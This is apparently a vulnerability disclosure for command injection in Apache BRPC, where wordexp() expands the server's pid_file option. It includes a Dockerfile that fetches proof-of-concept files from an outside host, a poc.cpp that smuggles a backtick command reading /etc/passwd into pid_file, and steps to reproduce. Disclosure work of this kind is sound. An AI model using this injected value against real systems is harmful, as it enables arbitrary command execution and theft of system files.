Description

BRPC is an Industrial-grade RPC framework using C++ Language, which is often used in high performance system such as Search, Storage, Machine learning, Advertisement, Recommendation etc. In server.cpp there are function call to wordexp(), it used for expanding path from user input. Due to lack of security mechanism, this function can be used for running system command.

Attachment

Dockerfile

FROM ubuntu:latest
RUN apt update && apt install -y wget git g++ make cmake libssl-dev libgflags-dev libprotobuf-dev libprotoc-dev protobuf-compiler libleveldb-dev
WORKDIR /
RUN git clone https://github.com/apache/brpc.git
WORKDIR /brpc
RUN cmake -B build && cmake --build build -j4
RUN mkdir -p build/POC
WORKDIR /brpc/build/POC
RUN wget https://exploit.syahrul.dev/brpc_pwn/CMakeLists.txt
RUN wget https://exploit.syahrul.dev/brpc_pwn/poc.cpp
RUN cmake -B build && cmake --build build -j4

docker-compose.yml

version: '3'
services:
  brpc:
    build: . 
    

Inside poc.cpp

#include <brpc/server.h>

int main(int argc, char* argv[]) {
    brpc::Server server;
    brpc::ServerOptions options;
    options.pid_file = "`cat /etc/passwd > /tmp/pwned_by_ru1es`";
    if (server.Start(1337, &options) != 0)
    {
        LOG(ERROR) << "Fail to start HttpServer";
        return -1;
    }
    server.RunUntilAskedToQuit();
    return 0;
}

Step to Reproduce

1. Save Dockerfile and docker-compose file in one directory
2. Run docker-compose up
3. After it finished, launch the container using docker compose run --rm brpc
4. Inside the container, run ./build/poc
5. Now check the /tmp/pwned_by_ru1es file

Impact

Running arbitrary command in affected system